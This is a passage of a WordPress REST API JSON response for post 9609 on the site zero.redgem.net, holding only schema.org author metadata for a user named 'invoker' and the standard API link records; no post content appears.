redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9609","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9609"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/9609\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9609"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9609"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9609"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}